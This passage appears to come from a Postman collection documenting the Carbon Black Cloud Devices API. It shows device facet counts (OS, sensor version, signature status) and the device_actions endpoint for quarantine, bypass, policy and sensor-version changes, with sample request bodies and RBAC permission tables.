},\n                {\n                    \"total\": 7,\n                    \"id\": \"Ubuntu 18.04.3\",\n                    \"name\": \"Ubuntu 18.04.3\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"MAC OS 11.7.5\",\n                    \"name\": \"MAC OS 11.7.5\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"MAC OS X 10.15.4\",\n                    \"name\": \"MAC OS X 10.15.4\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"CentOS 7.7-1908\",\n                    \"name\": \"CentOS 7.7-1908\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"CentOS 7.8-2003\",\n                    \"name\": \"CentOS 7.8-2003\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"MAC OS 11.6.5\",\n                    \"name\": \"MAC OS 11.6.5\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"MAC OS 11.7.3\",\n                    \"name\": \"MAC OS 11.7.3\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"MAC OS 11.7.4\",\n                    \"name\": \"MAC OS 11.7.4\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"CentOS 7.9-2009\",\n                    \"name\": \"CentOS 7.9-2009\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"MAC OS 11.4.0\",\n                    \"name\": \"MAC OS 11.4.0\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"MAC OS 11.6.6\",\n                    \"name\": \"MAC OS 11.6.6\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"MAC OS 11.7.2\",\n                    \"name\": \"MAC OS 11.7.2\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"MAC OS X 10.14.0\",\n                    \"name\": \"MAC OS X 10.14.0\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"MAC OS X 10.15.0\",\n                    \"name\": \"MAC OS X 10.15.0\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"Ubuntu 18.04.4\",\n                    \"name\": \"Ubuntu 18.04.4\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"Windows 7 x64\",\n                    \"name\": \"Windows 7 x64\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"MAC OS 11.7.7\",\n                    \"name\": \"MAC OS 11.7.7\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"MAC OS X 10.12.0\",\n                    \"name\": \"MAC OS X 10.12.0\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"MAC OS X 10.13.0\",\n                    \"name\": \"MAC OS X 10.13.0\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"RHEL 8.2\",\n                    \"name\": \"RHEL 8.2\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"Server 2008 R2 x64 SP: 1\",\n                    \"name\": \"Server 2008 R2 x64 SP: 1\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"Ubuntu 18.04.2\",\n                    \"name\": \"Ubuntu 18.04.2\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"Windows 8 x86\",\n                    \"name\": \"Windows 8 x86\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Debian 10.00\",\n                    \"name\": \"Debian 10.00\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS 11.5.1\",\n                    \"name\": \"MAC OS 11.5.1\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS 13.1.0\",\n                    \"name\": \"MAC OS 13.1.0\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS 13.4.1\",\n                    \"name\": \"MAC OS 13.4.1\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.11.0\",\n                    \"name\": \"MAC OS X 10.11.0\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.13.6\",\n                    \"name\": \"MAC OS X 10.13.6\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.15.3\",\n                    \"name\": \"MAC OS X 10.15.3\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.15.5\",\n                    \"name\": \"MAC OS X 10.15.5\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.15.7\",\n                    \"name\": \"MAC OS X 10.15.7\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"MAC OS X 10.9.0\",\n                    \"name\": \"MAC OS X 10.9.0\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Server 2012 x64\",\n                    \"name\": \"Server 2012 x64\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Ubuntu 18.04.5\",\n                    \"name\": \"Ubuntu 18.04.5\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Ubuntu 18.04.6 x64\",\n                    \"name\": \"Ubuntu 18.04.6 x64\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Ubuntu 20.04.3\",\n                    \"name\": \"Ubuntu 20.04.3\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Ubuntu 20.04.3 x64\",\n                    \"name\": \"Ubuntu 20.04.3 x64\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Ubuntu 20.04.4 x64\",\n                    \"name\": \"Ubuntu 20.04.4 x64\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Windows 8 x64\",\n                    \"name\": \"Windows 8 x64\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"Windows Server 2022 x64\",\n                    \"name\": \"Windows Server 2022 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"CentOS 6.10\",\n                    \"name\": \"CentOS 6.10\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"CentOS 7.5-1804\",\n                    \"name\": \"CentOS 7.5-1804\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"CentOS 7.7-1908 x64\",\n                    \"name\": \"CentOS 7.7-1908 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"CentOS 7.9-2009 x64\",\n                    \"name\": \"CentOS 7.9-2009 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Debian 11.07 x64\",\n                    \"name\": \"Debian 11.07 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 11.0.1\",\n                    \"name\": \"MAC OS 11.0.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 11.3.0\",\n                    \"name\": \"MAC OS 11.3.0\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 11.6.1\",\n                    \"name\": \"MAC OS 11.6.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 11.7.1\",\n                    \"name\": \"MAC OS 11.7.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 12.1.0\",\n                    \"name\": \"MAC OS 12.1.0\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 12.6.4\",\n                    \"name\": \"MAC OS 12.6.4\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS 12.6.8\",\n                    \"name\": \"MAC OS 12.6.8\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.10.0\",\n                    \"name\": \"MAC OS X 10.10.0\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.10.1\",\n                    \"name\": \"MAC OS X 10.10.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.11.6\",\n                    \"name\": \"MAC OS X 10.11.6\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.12.3\",\n                    \"name\": \"MAC OS X 10.12.3\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.12.6\",\n                    \"name\": \"MAC OS X 10.12.6\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.13.1\",\n                    \"name\": \"MAC OS X 10.13.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.13.4\",\n                    \"name\": \"MAC OS X 10.13.4\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.13.5\",\n                    \"name\": \"MAC OS X 10.13.5\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.14.1\",\n                    \"name\": \"MAC OS X 10.14.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.14.3\",\n                    \"name\": \"MAC OS X 10.14.3\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.15.6\",\n                    \"name\": \"MAC OS X 10.15.6\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"MAC OS X 10.8.0\",\n                    \"name\": \"MAC OS X 10.8.0\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"RHEL 8.1\",\n                    \"name\": \"RHEL 8.1\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"RHEL 8.1 x64\",\n                    \"name\": \"RHEL 8.1 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"SLES 12 SP4 x64\",\n                    \"name\": \"SLES 12 SP4 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"SLES 15 SP2\",\n                    \"name\": \"SLES 15 SP2\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Ubuntu 19.10 x64\",\n                    \"name\": \"Ubuntu 19.10 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Ubuntu 20.04 x64\",\n                    \"name\": \"Ubuntu 20.04 x64\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Ubuntu 20.04.2\",\n                    \"name\": \"Ubuntu 20.04.2\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Ubuntu 20.04.4\",\n                    \"name\": \"Ubuntu 20.04.4\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"Windows 11 arm64\",\n                    \"name\": \"Windows 11 arm64\"\n                }\n            ]\n        },\n        {\n            \"field\": \"sensor_version\",\n            \"values\": [\n                {\n                    \"total\": 79,\n                    \"id\": \"3.7.0.1253\",\n                    \"name\": \"3.7.0.1253\"\n                },\n                {\n                    \"total\": 66,\n                    \"id\": \"3.6.1.10\",\n                    \"name\": \"3.6.1.10\"\n                },\n                {\n                    \"total\": 58,\n                    \"id\": \"3.4.0.887\",\n                    \"name\": \"3.4.0.887\"\n                },\n                {\n                    \"total\": 42,\n                    \"id\": \"3.8.0.627\",\n                    \"name\": \"3.8.0.627\"\n                },\n                {\n                    \"total\": 37,\n                    \"id\": \"3.8.0.398\",\n                    \"name\": \"3.8.0.398\"\n                },\n                {\n                    \"total\": 35,\n                    \"id\": \"3.8.0.722\",\n                    \"name\": \"3.8.0.722\"\n                },\n                {\n                    \"total\": 31,\n                    \"id\": \"3.5.0.1680\",\n                    \"name\": \"3.5.0.1680\"\n                },\n                {\n                    \"total\": 30,\n                    \"id\": \"3.5.0.1786\",\n                    \"name\": \"3.5.0.1786\"\n                },\n                {\n                    \"total\": 29,\n                    \"id\": \"3.6.0.1979\",\n                    \"name\": \"3.6.0.1979\"\n                },\n                {\n                    \"total\": 28,\n                    \"id\": \"3.7.2.81\",\n                    \"name\": \"3.7.2.81\"\n                },\n                {\n                    \"total\": 28,\n                    \"id\": \"3.8.0.535\",\n                    \"name\": \"3.8.0.535\"\n                },\n                {\n                    \"total\": 27,\n                    \"id\": \"3.7.0.1503\",\n                    \"name\": \"3.7.0.1503\"\n                },\n                {\n                    \"total\": 26,\n                    \"id\": \"3.6.0.1719\",\n                    \"name\": \"3.6.0.1719\"\n                },\n                {\n                    \"total\": 24,\n                    \"id\": \"3.2.1.51\",\n                    \"name\": \"3.2.1.51\"\n                },\n                {\n                    \"total\": 22,\n                    \"id\": \"2.11.2.545096\",\n                    \"name\": \"2.11.2.545096\"\n                },\n                {\n                    \"total\": 22,\n                    \"id\": \"3.4.0.1070\",\n                    \"name\": \"3.4.0.1070\"\n                },\n                {\n                    \"total\": 20,\n                    \"id\": \"3.4.0.1086\",\n                    \"name\": \"3.4.0.1086\"\n                },\n                {\n                    \"total\": 20,\n                    \"id\": \"3.7.0.1411\",\n                    \"name\": \"3.7.0.1411\"\n                },\n                {\n                    \"total\": 19,\n                    \"id\": \"3.0.2.2\",\n                    \"name\": \"3.0.2.2\"\n                },\n                {\n                    \"total\": 18,\n                    \"id\": \"3.4.0.1099\",\n                    \"name\": \"3.4.0.1099\"\n                },\n                {\n                    \"total\": 16,\n                    \"id\": \"3.9.1.2464\",\n                    \"name\": \"3.9.1.2464\"\n                },\n                {\n                    \"total\": 15,\n                    \"id\": \"3.6.0.2076\",\n                    \"name\": \"3.6.0.2076\"\n                },\n                {\n                    \"total\": 14,\n                    \"id\": \"3.4.0.820\",\n                    \"name\": \"3.4.0.820\"\n                },\n                {\n                    \"total\": 13,\n                    \"id\": \"3.9.0.2357\",\n                    \"name\": \"3.9.0.2357\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"2.0.3.4\",\n                    \"name\": \"2.0.3.4\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"3.7.1.12\",\n                    \"name\": \"3.7.1.12\"\n                },\n                {\n                    \"total\": 11,\n                    \"id\": \"3.1.0.100\",\n                    \"name\": \"3.1.0.100\"\n                },\n                {\n                    \"total\": 11,\n                    \"id\": \"3.4.4.51\",\n                    \"name\": \"3.4.4.51\"\n                },\n                {\n                    \"total\": 10,\n                    \"id\": \"2.8.0.238774\",\n                    \"name\": \"2.8.0.238774\"\n                },\n                {\n                    \"total\": 10,\n                    \"id\": \"3.4.0.1097\",\n                    \"name\": \"3.4.0.1097\"\n                },\n                {\n                    \"total\": 9,\n                    \"id\": \"2.13.1.933911\",\n                    \"name\": \"2.13.1.933911\"\n                },\n                {\n                    \"total\": 9,\n                    \"id\": \"3.9.2.2698\",\n                    \"name\": \"3.9.2.2698\"\n                },\n                {\n                    \"total\": 8,\n                    \"id\": \"3.4.0.1016\",\n                    \"name\": \"3.4.0.1016\"\n                },\n                {\n                    \"total\": 8,\n                    \"id\": \"3.8.0.684\",\n                    \"name\": \"3.8.0.684\"\n                },\n                {\n                    \"total\": 7,\n                    \"id\": \"3.6.0.1897\",\n                    \"name\": \"3.6.0.1897\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"2.11.1.505724\",\n                    \"name\": \"2.11.1.505724\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"2.7.1.203046\",\n                    \"name\": \"2.7.1.203046\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"3.5.0.1756\",\n                    \"name\": \"3.5.0.1756\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"3.5.1.19\",\n                    \"name\": \"3.5.1.19\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"3.9.1.2691\",\n                    \"name\": \"3.9.1.2691\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"1.2.2.12\",\n                    \"name\": \"1.2.2.12\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"2.4.0.3\",\n                    \"name\": \"2.4.0.3\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"2.9.0.312585\",\n                    \"name\": \"2.9.0.312585\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"3.0.1.20\",\n                    \"name\": \"3.0.1.20\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"2.14.0.1321525\",\n                    \"name\": \"2.14.0.1321525\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"2.5.0.328\",\n                    \"name\": \"2.5.0.328\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"2.8.3.300614\",\n                    \"name\": \"2.8.3.300614\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"2.9.2.353316\",\n                    \"name\": \"2.9.2.353316\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.3.0.982\",\n                    \"name\": \"3.3.0.982\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.3.3.35\",\n                    \"name\": \"3.3.3.35\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.4.0.1052\",\n                    \"name\": \"3.4.0.1052\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.4.0.766\",\n                    \"name\": \"3.4.0.766\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.5.0.1590\",\n                    \"name\": \"3.5.0.1590\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.6.0.1791\",\n                    \"name\": \"3.6.0.1791\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"3.7.3.159\",\n                    \"name\": \"3.7.3.159\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"2.11.3.629089\",\n                    \"name\": \"2.11.3.629089\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.2.0.10101\",\n                    \"name\": \"3.2.0.10101\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.4.0.1091\",\n                    \"name\": \"3.4.0.1091\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.5.0.1523\",\n                    \"name\": \"3.5.0.1523\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.5.0.1627\",\n                    \"name\": \"3.5.0.1627\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.5.2.78\",\n                    \"name\": \"3.5.2.78\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.5.3.82\",\n                    \"name\": \"3.5.3.82\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"3.6.0.2127\",\n                    \"name\": \"3.6.0.2127\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"2.12.0.698755\",\n                    \"name\": \"2.12.0.698755\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"2.8.2.284694\",\n                    \"name\": \"2.8.2.284694\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.0.2.8\",\n                    \"name\": \"3.0.2.8\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.2.1.10\",\n                    \"name\": \"3.2.1.10\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.3.4.6\",\n                    \"name\": \"3.3.4.6\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.4.3.44\",\n                    \"name\": \"3.4.3.44\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.5.0.1801\",\n                    \"name\": \"3.5.0.1801\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.5.1.23\",\n                    \"name\": \"3.5.1.23\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"3.7.2.77\",\n                    \"name\": \"3.7.2.77\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"1.2.3.13\",\n                    \"name\": \"1.2.3.13\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.0.1.8\",\n                    \"name\": \"2.0.1.8\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.10.2.403960\",\n                    \"name\": \"2.10.2.403960\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.10.3.436900\",\n                    \"name\": \"2.10.3.436900\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.11.0.460062\",\n                    \"name\": \"2.11.0.460062\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.13.3.1121464\",\n                    \"name\": \"2.13.3.1121464\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.14.1.1646819\",\n                    \"name\": \"2.14.1.1646819\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"2.8.1.275105\",\n                    \"name\": \"2.8.1.275105\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.2.2.6\",\n                    \"name\": \"3.2.2.6\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.3.0.953\",\n                    \"name\": \"3.3.0.953\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.3.1.12\",\n                    \"name\": \"3.3.1.12\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.4.0.1047\",\n                    \"name\": \"3.4.0.1047\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.4.0.842\",\n                    \"name\": \"3.4.0.842\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.6.0.1941\",\n                    \"name\": \"3.6.0.1941\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.6.2.110\",\n                    \"name\": \"3.6.2.110\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"3.7.1.17\",\n                    \"name\": \"3.7.1.17\"\n                }\n            ]\n        },\n        {\n            \"field\": \"signature_status\",\n            \"values\": [\n                {\n                    \"total\": 479,\n                    \"id\": \"NOT_AVAILABLE\",\n                    \"name\": \"NOT_AVAILABLE\"\n                },\n                {\n                    \"total\": 316,\n                    \"id\": \"NOT_APPLICABLE\",\n                    \"name\": \"NOT_APPLICABLE\"\n                },\n                {\n                    \"total\": 253,\n                    \"id\": \"OUT_OF_DATE\",\n                    \"name\": \"OUT_OF_DATE\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"UP_TO_DATE\",\n                    \"name\": \"UP_TO_DATE\"\n                }\n            ]\n        },\n        {\n            \"field\": \"golden_device_status\",\n            \"values\": [\n                {\n                    \"total\": 1049,\n                    \"id\": \"NOT_GOLDEN_DEVICE\",\n                    \"name\": \"NOT_GOLDEN_DEVICE\"\n                },\n                {\n                    \"total\": 0,\n                    \"id\": \"GOLDEN_DEVICE\",\n                    \"name\": \"GOLDEN_DEVICE\"\n                }\n            ]\n        },\n        {\n            \"field\": \"host_based_firewall_status\",\n            \"values\": [\n                {\n                    \"total\": 1049,\n                    \"id\": \"NOT_ENABLED\",\n                    \"name\": \"NOT_ENABLED\"\n                },\n                {\n                    \"total\": 0,\n                    \"id\": \"ACTIVE\",\n                    \"name\": \"ACTIVE\"\n                },\n                {\n                    \"total\": 0,\n                    \"id\": \"ERRORS\",\n                    \"name\": \"ERRORS\"\n                },\n                {\n                    \"total\": 0,\n                    \"id\": \"WARNING\",\n                    \"name\": \"WARNING\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"a472f607-5d67-4950-8057-fc52511d4e8a"},{"name":"Device Actions","id":"75b88b3a-0188-4431-b1c0-53ab5d3e3280","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"UPDATE_POLICY\",\n    \"device_id\": [123456],\n    \"options\": {\n        \"policy_id\": 7890\n    }  \n};"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/device_actions","description":"<p>The device actions endpoint allows you to create and execute an action on devices.</p>\n<p>API request is common for all device actions.\nPOST request body will change for each device action.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n<th>Action Type</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device.quarantine</td>\n<td>EXECUTE</td>\n<td>QUARANTINE</td>\n</tr>\n<tr>\n<td>device.bypass</td>\n<td>EXECUTE</td>\n<td>BYPASS</td>\n</tr>\n<tr>\n<td>device.bg-scan</td>\n<td>EXECUTE</td>\n<td>BACKGROUND_SCAN</td>\n</tr>\n<tr>\n<td>device.policy</td>\n<td>UPDATE</td>\n<td>UPDATE_POLICY</td>\n</tr>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n<td>UPDATE_SENSOR_VERSION</td>\n</tr>\n<tr>\n<td>device.deregistered</td>\n<td>DELETE</td>\n<td>DEREGISTER_SENSOR</td>\n</tr>\n<tr>\n<td>device.uninstall</td>\n<td>EXECUTE</td>\n<td>DELETE_SENSOR</td>\n</tr>\n</tbody>\n</table>\n</div><p>The device actions endpoint allows you to create and execute an action on devices.</p>\n<ul>\n<li>API request is common for all device actions.</li>\n<li>POST request body will change for each device action.</li>\n</ul>\n<h3 id=\"request-body-schema\">Request Body Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Description</th>\n<th>Default</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>action_type</code></td>\n<td>Action to perform on selected devices. Allowed values: <code>BACKGROUND_SCAN</code>, <code>BYPASS</code>, <code>UNINSTALL_SENSOR</code>, <code>DELETE_SENSOR</code>, <code>QUARANTINE</code>, <code>UPDATE_POLICY</code>, <code>UPDATE_SENSOR_VERSION</code></td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>device_id</code></td>\n<td>List of devices to perform action on</td>\n<td>N/A</td>\n<td>Yes - either <code>device_id</code> or <code>search</code></td>\n</tr>\n<tr>\n<td><code>search</code></td>\n<td>A device search. Device actions will be performed on the result set of this search</td>\n<td>N/A</td>\n<td>Yes - either <code>device_id</code> or <code>search</code></td>\n</tr>\n<tr>\n<td><code>options.policy_id</code></td>\n<td>Devices will be updated to this policy ID</td>\n<td>N/A</td>\n<td>Required if action_type is set to <code>UPDATE_POLICY</code></td>\n</tr>\n<tr>\n<td><code>options.sensor_version</code></td>\n<td>Devices will be updated to this sensor version</td>\n<td>N/A</td>\n<td>Required if action_type is set to <code>UPDATE_SENSOR_VERSION</code></td>\n</tr>\n<tr>\n<td><code>options.toggle</code></td>\n<td>Determines whether to toggle action <code>ON</code> or <code>OFF</code>. Allowed values: <code>ON</code>, <code>OFF</code></td>\n<td>N/A</td>\n<td>Required if action_type is set to <code>QUARANTINE</code>, <code>BYPASS</code>, or <code>BACKGROUND_SCAN</code>.</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#device-actions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","device_actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"eea569b5-09d0-4373-b216-a716ae3d0609","name":"Quarantine Device","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"QUARANTINE\",\n    \"device_id\": [{{cb_device_id}}],\n    \"options\": {\n        \"toggle\": \"ON\"\n    }\n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/device_actions"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"37a08bc8-888f-4354-843b-3736b9c37bba","name":"Move Device to New Policy","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"action_type\": \"UPDATE_POLICY\",\n    \"device_id\": [123456],\n    \"options\": {\n        \"policy_id\": 7890\n    }  \n}"},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/device_actions"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""}],"_postman_id":"75b88b3a-0188-4431-b1c0-53ab5d3e3280"}],"id":"b0fa6e34-f302-477b-bec2-eee0bb082237","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>We have extended the capabilities of the <strong>Devices API</strong> by improving the methods of retrieving device information and added functionality to <strong>perform actions</strong>. You can now more efficiently call an API with a wider range of <strong>filterable fields</strong>, including policy ID, status, operating system and more. You can also perform actions on individual devices such as <strong>quarantine/unquarantine, enable or disable bypass, or upgrade</strong> to a new sensor version.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/\">See Documentation</a></p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"ffa307c3-120e-4aa6-a782-bbb7cc4e59a8"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"a32b3b34-0f25-46c9-90e0-9d8cb31e6885"}}],"_postman_id":"b0fa6e34-f302-477b-bec2-eee0bb082237","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Job Service API","item":[{"name":"List All Available Jobs","id":"4c2656d4-1af9-459e-bf8d-708484a228ee","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"","description":"<p>Lists all available jobs. A user or connector can only see jobs assigned to themselves.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a 